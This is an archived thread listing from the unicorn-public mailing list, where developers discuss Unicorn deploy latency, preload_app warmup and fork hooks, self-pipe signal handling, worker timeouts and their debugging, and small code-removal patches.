> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
> 
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork?

If preload_app is true, you can warmup in before_fork; otherwise it
needs to be after_fork.

> If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then it's turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there...

With preload_app and warmup, you need to ensure any stream connections
(DB, memcached, redis, etc..) do not get shared between processes, so
it's standard practice to disconnect in the parent and reconnect in the
child.
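In unicorn.rb terms, that disconnect-in-parent/reconnect-in-child pattern is usually written like this (a sketch; the $redis global is a hypothetical stand-in for whatever app-level stream connections the app holds):

```ruby
# unicorn.rb (excerpt) -- keep stream connections out of fork().
# Sketch only; $redis is a hypothetical example of an app-level
# connection (memcached, neo4j, etc. follow the same pattern).
before_fork do |server, worker|
  # Close sockets the master opened (via preload or warmup) so the
  # file descriptors are not shared with every child.
  ActiveRecord::Base.connection_pool.disconnect! if defined?(ActiveRecord::Base)
  $redis.quit if defined?($redis) && $redis
end

after_fork do |server, worker|
  # Reconnect in each worker: every child gets its own sockets.
  ActiveRecord::Base.establish_connection if defined?(ActiveRecord::Base)
  $redis = Redis.new(url: ENV['REDIS_URL']) if defined?(Redis)
end
```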

> If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?

I've been leaving killing the master outside of the unicorn hooks
and doing it as a separate step; seemed too fragile to do it in
hooks from my perspective.
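Done as a separate step, that can be a small script run once the new master is up and serving (a sketch; the pid directory is hypothetical):

```shell
#!/bin/sh
# Stop the old unicorn master after a USR2 re-exec, outside any hooks.
# Hypothetical pid location; unicorn renames the old master's pid file
# to "<pid>.oldbin" when the new master starts.
PIDS=/var/www/app/shared/tmp/pids
if [ -s "$PIDS/unicorn.pid.oldbin" ]; then
  # QUIT is graceful: old workers finish in-flight requests, then exit.
  kill -QUIT "$(cat "$PIDS/unicorn.pid.oldbin")"
fi
```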

^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  2015-03-04 20:24  4%           ` Sarkis Varozian
@ 2015-03-04 20:27  0%             ` Michael Fischer
  2015-03-04 20:35  0%             ` Eric Wong
  1 sibling, 0 replies; 200+ results
From: Michael Fischer @ 2015-03-04 20:27 UTC (permalink / raw)
  To: Sarkis Varozian; +Cc: unicorn-public

before_fork should work fine.  The children which will actually handle the
requests will inherit everything from the parent, including any libraries
that were loaded by the master process as a result of handling the mock
requests.  It'll also conserve memory, which is a nice benefit.

On Wed, Mar 4, 2015 at 12:24 PM, Sarkis Varozian <svarozian@gmail.com>
wrote:

> That does make sense - I was looking at another suggestion from a user
> here (Braulio) of running a "warmup" using rack MockRequest:
> https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77
>
> The only issue I am having with the above solution is it is happening in
> the before_fork block - shouldn't I warmup the connection in after_fork? If
> I follow the above gist properly it warms up the server with the old
> activerecord base connection and then it's turned off, then turned back on
> in after_fork. I think I am not understanding the sequence of events
> there... If this is the case, I should warmup and also check/kill the old
> master in the after_fork block after the new db, redis, neo4j connections
> are all created. Thoughts?
>
> On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
> wrote:
>
>> I'm not exactly sure how preload_app works, but I suspect your app is
>> lazy-loading a number of Ruby libraries while handling the first few
>> requests that weren't automatically loaded during the preload process.
>>
>> Eric, your thoughts?
>>
>> --Michael
>>
>> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
>> wrote:
>>
>>> Yes, preload_app is set to true, I have not made any changes to the
>>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>>
>>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>>> server with the highest response times: http://goo.gl/0HyUYt (in this
>>> graph: http://goo.gl/x7KcKq)
>>>
>>> Looks like it may be i/o related as you suspect - is there much I can do
>>> to alleviate that?
>>>
>>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>>> wrote:
>>>
>>>> What does your I/O latency look like during this interval?  (iostat -xk
>>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>>> strongly correlated with I/O load.
>>>>
>>>> Also is preload_app set to true?  This should help.
>>>>
>>>> --Michael
>>>>
>>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>>> wrote:
>>>>
>>>>> Michael,
>>>>>
>>>>> Thanks for this - I have since changed the way we are restarting the
>>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>>
>>>>> in :sequence, wait: 30
>>>>>
>>>>> We have 4 backends and the above will restart them sequentially,
>>>>> waiting 30s (which I think should be more than enough time), however, I
>>>>> still get the following latency spikes after a deploy:
>>>>> http://goo.gl/tYnLUJ
>>>>>
>>>>> This is what the individual servers look like for the same time
>>>>> interval: http://goo.gl/x7KcKq
>>>>>
>>>>>
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>>> wrote:
>>>>>
>>>>>> If the response times are falling a minute or so after the reload,
>>>>>> I'd chalk it up to a cold CPU cache.  You will probably want to stagger
>>>>>> your reloads across backends to minimize the impact.
>>>>>>
>>>>>> --Michael
>>>>>>
>>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>>> wrote:
>>>>>>
>>>>>>> We have a rails application with the following unicorn.rb:
>>>>>>> http://goo.gl/qZ5NLn
>>>>>>>
>>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>>> unicorn
>>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>>> workers come online.
>>>>>>>
>>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is
>>>>>>> inconsistent -
>>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>>> is
>>>>>>> higher than previous deploys.
>>>>>>>
>>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>>> tools/profilers to use to get to the bottom of this? Should we
>>>>>>> expect this
>>>>>>> to happen on each deploy?
>>>>>>>
>>>>>>> Thanks,
>>>>>>>
>>>>>>> --
>>>>>>> *Sarkis Varozian*
>>>>>>> svarozian@gmail.com
>>>>>>>
>>>>>>>
>>>>>>>
>>>>>>
>>>>>
>>>>>
>>>>> --
>>>>> *Sarkis Varozian*
>>>>> svarozian@gmail.com
>>>>>
>>>>
>>>>
>>>
>>>
>>> --
>>> *Sarkis Varozian*
>>> svarozian@gmail.com
>>>
>>
>>
>
>
> --
> *Sarkis Varozian*
> svarozian@gmail.com
>




^ permalink raw reply	[relevance 0%]

* Re: Request Queueing after deploy + USR2 restart
  @ 2015-03-04 20:24  4%           ` Sarkis Varozian
  2015-03-04 20:27  0%             ` Michael Fischer
  2015-03-04 20:35  0%             ` Eric Wong
  0 siblings, 2 replies; 200+ results
From: Sarkis Varozian @ 2015-03-04 20:24 UTC (permalink / raw)
  To: Michael Fischer; +Cc: unicorn-public

That does make sense - I was looking at another suggestion from a user here
(Braulio) of running a "warmup" using rack MockRequest:
https://gist.github.com/brauliobo/11298486#file-unicorn-conf-rb-L77

The only issue I am having with the above solution is it is happening in
the before_fork block - shouldn't I warmup the connection in after_fork? If
I follow the above gist properly it warms up the server with the old
activerecord base connection and then it's turned off, then turned back on
in after_fork. I think I am not understanding the sequence of events
there... If this is the case, I should warmup and also check/kill the old
master in the after_fork block after the new db, redis, neo4j connections
are all created. Thoughts?

On Wed, Mar 4, 2015 at 12:17 PM, Michael Fischer <mfischer@zendesk.com>
wrote:

> I'm not exactly sure how preload_app works, but I suspect your app is
> lazy-loading a number of Ruby libraries while handling the first few
> requests that weren't automatically loaded during the preload process.
>
> Eric, your thoughts?
>
> --Michael
>
> On Wed, Mar 4, 2015 at 11:58 AM, Sarkis Varozian <svarozian@gmail.com>
> wrote:
>
>> Yes, preload_app is set to true, I have not made any changes to the
>> unicorn.rb from OP: http://goo.gl/qZ5NLn
>>
>> Hmmmm, you may be onto something - Here is the i/o metrics from the
>> server with the highest response times: http://goo.gl/0HyUYt (in this
>> graph: http://goo.gl/x7KcKq)
>>
>> Looks like it may be i/o related as you suspect - is there much I can do
>> to alleviate that?
>>
>> On Wed, Mar 4, 2015 at 11:51 AM, Michael Fischer <mfischer@zendesk.com>
>> wrote:
>>
>>> What does your I/O latency look like during this interval?  (iostat -xk
>>> 10, look at the busy %).  I'm willing to bet the request queueing is
>>> strongly correlated with I/O load.
>>>
>>> Also is preload_app set to true?  This should help.
>>>
>>> --Michael
>>>
>>> On Wed, Mar 4, 2015 at 11:48 AM, Sarkis Varozian <svarozian@gmail.com>
>>> wrote:
>>>
>>>> Michael,
>>>>
>>>> Thanks for this - I have since changed the way we are restarting the
>>>> unicorn servers after a deploy by changing capistrano task to do:
>>>>
>>>> in :sequence, wait: 30
>>>>
>>>> We have 4 backends and the above will restart them sequentially,
>>>> waiting 30s (which I think should be more than enough time), however, I
>>>> still get the following latency spikes after a deploy:
>>>> http://goo.gl/tYnLUJ
>>>>
>>>> This is what the individual servers look like for the same time
>>>> interval: http://goo.gl/x7KcKq
>>>>
>>>>
>>>>
>>>> On Tue, Mar 3, 2015 at 2:32 PM, Michael Fischer <mfischer@zendesk.com>
>>>> wrote:
>>>>
>>>>> If the response times are falling a minute or so after the reload, I'd
>>>>> chalk it up to a cold CPU cache.  You will probably want to stagger your
>>>>> reloads across backends to minimize the impact.
>>>>>
>>>>> --Michael
>>>>>
>>>>> On Tue, Mar 3, 2015 at 2:24 PM, Sarkis Varozian <svarozian@gmail.com>
>>>>> wrote:
>>>>>
>>>>>> We have a rails application with the following unicorn.rb:
>>>>>> http://goo.gl/qZ5NLn
>>>>>>
>>>>>> When we deploy to the application, a USR2 signal is sent to the
>>>>>> unicorn
>>>>>> master which spins up a new master and we use the before_fork in the
>>>>>> unicorn.rb config above to send signals to the old master as the new
>>>>>> workers come online.
>>>>>>
>>>>>> I've been trying to debug a weird issue that manifests as "Request
>>>>>> Queueing" in our Newrelic APM. The graph shows what happens after a
>>>>>> deployment (represented by the vertical lines). Here is the graph:
>>>>>> http://goo.gl/iFZPMv . As you see from the graph, it is inconsistent
>>>>>> -
>>>>>> there is always a latency spike - however, at times Request Queueing
>>>>>> is
>>>>>> higher than previous deploys.
>>>>>>
>>>>>> Any ideas on what exactly is going on here? Any suggestions on
>>>>>> tools/profilers to use to get to the bottom of this? Should we expect
>>>>>> this
>>>>>> to happen on each deploy?
>>>>>>
>>>>>> Thanks,
>>>>>>
>>>>>> --
>>>>>> *Sarkis Varozian*
>>>>>> svarozian@gmail.com
>>>>>>
>>>>>>
>>>>>>
>>>>>
>>>>
>>>>
>>>> --
>>>> *Sarkis Varozian*
>>>> svarozian@gmail.com
>>>>
>>>
>>>
>>
>>
>> --
>> *Sarkis Varozian*
>> svarozian@gmail.com
>>
>
>


-- 
*Sarkis Varozian*
svarozian@gmail.com


^ permalink raw reply	[relevance 4%]

* Re: Bug, Unicorn can drop signals in extreme conditions
  @ 2015-02-18  9:15  3% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-02-18  9:15 UTC (permalink / raw)
  To: Steven Stewart-Gallus; +Cc: unicorn-public, Jesse Storimer

Steven Stewart-Gallus <sstewartgallus00@mylangara.bc.ca> wrote:
> Hello,
> 
> While reading the article at
> http://www.sitepoint.com/the-self-pipe-trick-explained/ I realized
> that the signal handling code shown there and of the same type in your
> application is broken.  As you have a single nonblocking pipe in your
> application you can drop signals entirely (and not just fold multiple
> signals of the same type into one).  The simplest fix is to use a pipe
> for each individual type of signal or to just use pselect or similar.
> I'm pretty sure that there is a way to use a single pipe but it seems
> complicated and very difficult to implement correctly.

(I've Cc-ed Jesse for this)

I wasn't sure exactly what you were referring to, but now I see where
the sitepoint.com article makes calls in the wrong order:

     self_writer.write_nonblock('.') # XXX may fail!
     SIGNAL_QUEUE << signal

In contrast, unicorn enqueues the signal before attempting to write to
the pipe, so we don't care at all if the write fails.  It doesn't matter
if the non-blocking write fails due to the pipe being full at all; as
any existing data in the pipe is sufficient to cause the reader to wake
up.

The correct order would be:

     SIGNAL_QUEUE << signal
     self_writer.write_nonblock('.') # we don't care if this fails

Furthermore, this avoids a race condition in multi-threaded situations.
Order is critical: even outside of signal handlers, this ordering of
events is fundamental to correct usage of things like condition
variables and waitqueues.
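A runnable illustration of that ordering (a sketch with assumed names,
not unicorn's actual internals):

```ruby
# Minimal self-pipe sketch: enqueue the signal first, then wake the
# reader. A failed nonblocking write is harmless because any byte
# already sitting in the pipe is enough to wake the reader.
SIGNAL_QUEUE = []
self_reader, self_writer = IO.pipe

trap(:USR1) do
  SIGNAL_QUEUE << :USR1               # 1. enqueue first
  begin
    self_writer.write_nonblock('.')   # 2. then wake; failure is fine
  rescue IO::WaitWritable, Errno::EINTR
    # pipe full: the reader will wake anyway from data already in it
  end
end

Process.kill(:USR1, Process.pid)      # simulate receiving the signal
IO.select([self_reader])              # main loop blocks here
self_reader.read_nonblock(1024) rescue nil  # drain wakeup byte(s)
sig = SIGNAL_QUEUE.shift
```

With the sitepoint.com ordering, a full pipe would drop the wakeup
*and* the queue entry; with this ordering, only the redundant wakeup
byte is lost.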


Btw, MRI 1.9.3+ also uses the self-pipe trick internally, too (see
thread_pthread.c) for signals and thread switching.  Current versions
use two pipes, one for high-priority wakeups, and one for low-priority
wakeups.

And on a related note, using pselect/ppoll/epoll_pwait/signalfd-style
syscalls which affect the signal mask is not feasible with runtimes
which already implement a high-level signal handling API.  I ripped out
signalfd support from sleepy_penguin a few years back because it would
always conflict with the signal handling API in Ruby itself...

And eventfd is cheaper and usable in place of a self-pipe from Ruby, of
course(*), but I haven't convinced ruby-core it's worth the maintenance
effort for thread_pthread.c; so a conservative project like unicorn
won't use it, yet.

Anyways, thanks for bringing this to our attention.


(*) I use it in yet another horribly-named server :)

^ permalink raw reply	[relevance 3%]

* Re: Timeouts longer than expected.
  @ 2015-01-29 20:00  5% ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-01-29 20:00 UTC (permalink / raw)
  To: Antony Gelberg; +Cc: unicorn-public

Antony Gelberg <antony.gelberg@gmail.com> wrote:
> Hi all.  We use unicorn in production across four servers, behind
> nginx and HAProxy (to load balance).  We set a 300s timeout in the
> config file.  On an average day, we see something like:
> 
> E, [2015-01-22T17:01:24.335600 #4311] ERROR -- : worker=2 PID:21101
> timeout (301s > 300s), killing
> 
> in our logs, ~60 times.  However, one day we noticed that production
> had gone down with all the unicorns showing entries like the
> following:
> 
> E, [2015-01-22T12:35:15.643020 #4311] ERROR -- : worker=1 PID:4605
> timeout (451s > 300s), killing
> 
> (note the 451s before it was killed).

What other log entries appear in the 8 minutes leading up to the 451s
line?

Which version of unicorn is this?

There were some bugs fixed in ancient unicorn versions; and current
versions are still affected by big NTP adjustments due to the lack of
monotonic clock API in older Rubies.

I have a patch queued up for 5.x to use the monotonic clock, but
requires Ruby 2.1+ to be useful:
http://bogomips.org/unicorn-public/m/20150118033916.GA4478%40dcvr.yhbt.net.html

Maybe there's another sleep calculation bug, though.  Not many people
rely on giant timeouts and probably never notice it.

I'll take a closer look at the master sleep calculations (in
murder_lazy_workers) in a week or so and see if there's another problem
lurking in the current versions.

> Any clues how we can better-understand the root cause, even if it's
> something we'll put in place for the future?  We lack visibility here.

I'd use an in-process timeout to get backtraces.  The
Application_Timeouts doc in the source and online has more
tips on dealing with timeouts in general.

  http://unicorn.bogomips.org/Application_Timeouts.html
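A minimal sketch of such an in-process timeout as Rack middleware,
using the stdlib Timeout module (which has well-known caveats; the
Application_Timeouts doc above discusses safer options). The class
name and the 0.1s demo value are illustrative:

```ruby
require 'timeout'

# Raise inside the worker just before unicorn's kill-based timeout
# would fire, so the log gets an application backtrace instead of a
# silent SIGKILL.
class InProcessTimeout
  def initialize(app, seconds)
    @app, @seconds = app, seconds
  end

  def call(env)
    Timeout.timeout(@seconds) { @app.call(env) }
  end
end

slow_app = lambda { |env| sleep 2; [200, {}, ['done']] }
guarded  = InProcessTimeout.new(slow_app, 0.1)  # real apps: just under 300s

begin
  guarded.call({})
  timed_out = false
rescue Timeout::Error
  timed_out = true  # the backtrace points at the stuck line
end
```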

Also curious: you have users willing to wait 5 minutes for an
HTTP response?  Yikes!

^ permalink raw reply	[relevance 5%]

* [RFC] remove old inetd+git examples and exec_cgi
@ 2015-01-22  5:12  4% Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2015-01-22  5:12 UTC (permalink / raw)
  To: unicorn-public

I'm tempted to remove these for 5.x, but maybe somebody depends on the
lib/unicorn/app/* portions somewhere... Does anybody care?

Subject: [PATCH] remove old inetd+git examples and exec_cgi

While it was technically interesting and fun to tunnel arbitrary
protocols over a semi-compliant Rack interface, nobody actually does
it (and anybody who does can look in our git history).  This was
from back in 2009 when this was one of the few servers that could
handle chunked uploads, nowadays everyone does it! (or do they? :)

A newer version of exec_cgi.rb still lives on in the repository of
yet another horribly-named server, but there's no point in bloating
the installation footprint of somewhat popular server such as unicorn.
---
 examples/git.ru             |  13 ----
 lib/unicorn/app/exec_cgi.rb | 154 --------------------------------------------
 lib/unicorn/app/inetd.rb    | 109 -------------------------------
 3 files changed, 276 deletions(-)
 delete mode 100644 examples/git.ru
 delete mode 100644 lib/unicorn/app/exec_cgi.rb
 delete mode 100644 lib/unicorn/app/inetd.rb
-- 
EW

^ permalink raw reply	[relevance 4%]

* Re: Unicorn workers timing out intermittently
  2014-12-30 18:12  0% ` Eric Wong
@ 2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 0 replies; 200+ results
From: Aaron Price @ 2014-12-30 20:02 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public

Thanks for your help, Eric.

I was able to pinpoint the issue, and I've posted the solution.

The issue was that I wasn't closing a database connection for code run
in custom Rack middleware, which is why the logs didn't show anything.

http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently/655478#655478

Thanks again.


On Tue, Dec 30, 2014 at 1:12 PM, Eric Wong <e@80x24.org> wrote:

> Aaron Price <aprice@flipgive.com> wrote:
> > Hey guys,
> >
> > I'm having the following issue and I was hoping you might be able to shed
> > some light on the issue. Maybe give some suggestions on how to debug the
> > actual problem.
> >
> >
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently
>
> (quoting the problem in full to save folks from having to load the page)
>
> >    I'm getting intermittent timeouts from unicorn workers for seemingly
> no
> >    reason, and I'd like some help to debug the actual problem. It's worse
> >    because it works about 10 - 20 requests then 1 will timeout, then
> >    another 10 - 20 requests and the same thing will happen again.
> >
> >    I've created a dev environment to illustrate this particular problem,
> >    so there is NO traffic except mine.
> >
> >    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
> >    4.8.3, Nginx 1.6.2.
> >
> >    The Problem
> >
> >    I'll describe in detail the time that it doesn't work.
> >
> >    I request a url through the browser.
> > Started GET
> "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> > 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
> for 127.0
> > .0.1 at 2014-12-30 15:58:59 +0000
> > Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> >
> >    As you can see, the request completed successfully with a 200 response
> >    status in just 10.3ms.
> >
> >    However, the browser hangs for about 30 seconds and Unicorn kills the
> >    worker:
> > E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594
> timeout (31
> > s > 30s), killing
> > E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped
> #<Process::Status: pid
> > 14594 SIGKILL (signal 9)> worker=0
> > I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> >
> >    And the following error in the Nginx logs:
> > 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed
> connection
> > while reading response header from upstream, client: 127.0.0.1, server:
> localhos
> > t, request: "GET
> /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> >
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z
> HTTP/1
> > .1", upstream: "http://unix:
> /app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> >
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> > _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer:
> "http:/
> >
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> > 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"
>
> OK, the problem should be reproducible hitting unicorn directly (easy to
> configure a TCP listener) and eliminating nginx as a possible
> point-of-failure.  Also, I suggest using curl so you can script and see
> everything going on more easily at the protocol/syscall level.
>
> >    Again. There's no load on the server at all. The only requests going
> >    through are my own and every 10 - 20 requests at random have this same
> >    problem.
>
> OK, the main culprit is usually external connections acting up.  Postgres,
> external monitoring services, network failures, etc...
>
> >    It doesn't look like unicorn is eating memory at all. I know this
> >    because I'm using watch -n 0.5 free -m and this is the result.
>
> What does the CPU usage look like?
>
> >              total       used       free     shared    buffers     cached
> > Mem:          1995        765       1229          0         94        405
> > -/+ buffers/cache:        264       1730
> > Swap:          511          0        511
> >
> >    So the server isn't running out of memory.
> >
> >    Is there anything further I can do to debug this issue? or any insight
> >    into what's happening?
>
> Basically, minimize and isolate things.  Use a single worker, strace
> that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
> using curl.
>
> Is the Postgres doing OK?  How is the network connection to that?
> What other external resources (monitoring services, memcached, redis,
> etc...) might you be hitting?  You'll see blocking (on things like
> read*/write*/select/poll/recvmsg/sendmsg) on strace.
>
> You can map numeric file descriptors to ports via:
>  lsof -p $PID_OF_WORKER
>
> Also, is your server running out of entropy?  (You'll see blocking on
> reading /dev/random via strace) and you may also see low values in
> /proc/sys/kernel/random/entropy_avail
>



-- 
*Aaron Price*
Sr. Web Developer
FlipGive
P: (416) 583-2510

312 Adelaide St. West, Suite 301
Toronto, ON, M5V 1R2
www.flipgive.com

Follow us on: Facebook <http://www.facebook.com/FlipGive> | Twitter
<http://twitter.com/FlipGive> | LinkedIn
<http://www.linkedin.com/company/FlipGive>


^ permalink raw reply	[relevance 0%]

* Re: Unicorn workers timing out intermittently
  @ 2014-12-30 18:12  0% ` Eric Wong
  2014-12-30 20:02  0%   ` Aaron Price
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-12-30 18:12 UTC (permalink / raw)
  To: Aaron Price; +Cc: unicorn-public

Aaron Price <aprice@flipgive.com> wrote:
> Hey guys,
> 
> I'm having the following issue and I was hoping you might be able to shed
> some light on the issue. Maybe give some suggestions on how to debug the
> actual problem.
> 
> http://serverfault.com/questions/655430/unicorn-workers-timing-out-intermittently

(quoting the problem in full to save folks from having to load the page)

>    I'm getting intermittent timeouts from unicorn workers for seemingly no
>    reason, and I'd like some help to debug the actual problem. It's worse
>    because it works about 10 - 20 requests then 1 will timeout, then
>    another 10 - 20 requests and the same thing will happen again.
> 
>    I've created a dev environment to illustrate this particular problem,
>    so there is NO traffic except mine.
> 
>    The stack is Ubuntu 14.04, Rails 3.2.21, PostgreSQL 9.3.4, Unicorn
>    4.8.3, Nginx 1.6.2.
> 
>    The Problem
> 
>    I'll describe in detail the time that it doesn't work.
> 
>    I request a url through the browser.
> Started GET "/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T1
> 8:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z" for 127.0
> .0.1 at 2014-12-30 15:58:59 +0000
> Completed 200 OK in 10.3ms (Views: 0.0ms | ActiveRecord: 2.1ms)
> 
>    As you can see, the request completed successfully with a 200 response
>    status in just 10.3ms.
> 
>    However, the browser hangs for about 30 seconds and Unicorn kills the
>    worker:
> E, [2014-12-30T15:59:30.267605 #13678] ERROR -- : worker=0 PID:14594 timeout (31
> s > 30s), killing
> E, [2014-12-30T15:59:30.279000 #13678] ERROR -- : reaped #<Process::Status: pid
> 14594 SIGKILL (signal 9)> worker=0
> I, [2014-12-30T15:59:30.355085 #23533]  INFO -- : worker=0 ready
> 
>    And the following error in the Nginx logs:
> 2014/12/30 15:59:30 [error] 23463#0: *27 upstream prematurely closed connection
> while reading response header from upstream, client: 127.0.0.1, server: localhos
> t, request: "GET /offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-
> 28T18:01:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z HTTP/1
> .1", upstream: "http://unix:/app/shared/tmp/sockets/unicorn.sock:/offers.xml?q%5
> bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:01:16Z&q%5bupdated_at_less
> _than_or_equal_to%5d=2014-12-28T19:30:21Z", host: "localhost", referrer: "http:/
> /localhost/offers.xml?q%5bupdated_at_greater_than_or_equal_to%5d=2014-12-28T18:0
> 1:16Z&q%5bupdated_at_less_than_or_equal_to%5d=2014-12-28T19:30:21Z"

OK, the problem should be reproducible hitting unicorn directly (easy to
configure a TCP listener) and eliminating nginx as a possible
point-of-failure.  Also, I suggest using curl so you can script and see
everything going on more easily at the protocol/syscall level.

>    Again. There's no load on the server at all. The only requests going
>    through are my own and every 10 - 20 requests at random have this same
>    problem.

OK, the main culprit is usually external connections acting up.  Postgres,
external monitoring services, network failures, etc...

>    It doesn't look like unicorn is eating memory at all. I know this
>    because I'm using watch -n 0.5 free -m and this is the result.

What does the CPU usage look like?

>              total       used       free     shared    buffers     cached
> Mem:          1995        765       1229          0         94        405
> -/+ buffers/cache:        264       1730
> Swap:          511          0        511
> 
>    So the server isn't running out of memory.
> 
>    Is there anything further I can do to debug this issue? or any insight
>    into what's happening?

Basically, minimize and isolate things.  Use a single worker, strace
that worker ("strace -f -p $PID_OF_WORKER") and send a request to it
using curl.

Is the Postgres doing OK?  How is the network connection to that?
What other external resources (monitoring services, memcached, redis,
etc...) might you be hitting?  You'll see blocking (on things like
read*/write*/select/poll/recvmsg/sendmsg) on strace.

You can map numeric file descriptors to ports via:
 lsof -p $PID_OF_WORKER

Also, is your server running out of entropy?  (You'll see blocking on
reading /dev/random via strace) and you may also see low values in
/proc/sys/kernel/random/entropy_avail
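The entropy check can be scripted, e.g. (the /proc path is real on
Linux; the guard just keeps this runnable elsewhere):

```ruby
# Read the kernel's available-entropy estimate, if this is Linux.
path = '/proc/sys/kernel/random/entropy_avail'
entropy = File.exist?(path) ? File.read(path).to_i : nil
```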

^ permalink raw reply	[relevance 0%]

* [PATCH] tmpio: drop the "size" method
  @ 2014-12-28  7:17  4%   ` Eric Wong
  0 siblings, 0 replies; 200+ results
From: Eric Wong @ 2014-12-28  7:17 UTC (permalink / raw)
  To: unicorn-public

Eric Wong <e@80x24.org> wrote:
> But there ought to be tiny gains made from dropping 1.8 support,
> so I'll probably go ahead and do it...

Tiny stuff like this:
----------------------------8<-------------------------
From: Eric Wong <e@80x24.org>
Subject: [PATCH] tmpio: drop the "size" method

It is redundant given the existence of File#size in Ruby 1.9+

This saves 1440 bytes of bytecode on x86-64 under 2.2.0,
and at least another 120 bytes for the method entry,
hash table entry, and method definition overhead.
---
 lib/unicorn/tmpio.rb | 5 -----
 1 file changed, 5 deletions(-)

diff --git a/lib/unicorn/tmpio.rb b/lib/unicorn/tmpio.rb
index 2da05a2..c97979a 100644
--- a/lib/unicorn/tmpio.rb
+++ b/lib/unicorn/tmpio.rb
@@ -21,9 +21,4 @@ class Unicorn::TmpIO < File
     fp.sync = true
     fp
   end
-
-  # for easier env["rack.input"] compatibility with Rack <= 1.1
-  def size
-    stat.size
-  end unless File.method_defined?(:size)
 end
-- 
EW


^ permalink raw reply related	[relevance 4%]

* RE: Issue with Unicorn: Big latency when getting a request
  2014-11-14 10:28  5%                   ` Eric Wong
@ 2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
  0 siblings, 0 replies; 200+ results
From: Roberto Cordoba del Moral @ 2014-11-14 10:51 UTC (permalink / raw)
  To: Eric Wong; +Cc: unicorn-public@bogomips.org

I'm getting this warning when starting nginx:

nginx: [warn] 1024 worker_connections exceed open file resource limit: 256

Could it be related to this?
> Date: Fri, 14 Nov 2014 10:28:57 +0000
> From: e@80x24.org
> To: roberto.chingon@hotmail.com
> CC: unicorn-public@bogomips.org
> Subject: Re: Issue with Unicorn: Big latency when getting a request
> 
> Can you try Thin, Puma or another server?
> 
> Maybe configuring more unicorn worker_processes can help if your JS
> needs multiple connections to function for some reason.
> unicorn cannot do concurrency without multiple worker_processes.
> 
> I cannot view screenshots (or any images/video).

^ permalink raw reply	[relevance 0%]

* Re: Issue with Unicorn: Big latency when getting a request
  @ 2014-11-14 10:28  5%                   ` Eric Wong
  2014-11-14 10:51  0%                     ` Roberto Cordoba del Moral
  0 siblings, 1 reply; 200+ results
From: Eric Wong @ 2014-11-14 10:28 UTC (permalink / raw)
  To: Roberto Cordoba del Moral; +Cc: unicorn-public

Can you try Thin, Puma or another server?

Maybe configuring more unicorn worker_processes can help if your JS
needs multiple connections to function for some reason.
unicorn cannot do concurrency without multiple worker_processes.

I cannot view screenshots (or any images/video).

^ permalink raw reply	[relevance 5%]

* Re: Having issue with Unicorn
  2014-10-24 20:58  5%                   ` Eric Wong
@ 2014-10-24 21:24  0%                     ` Imdad
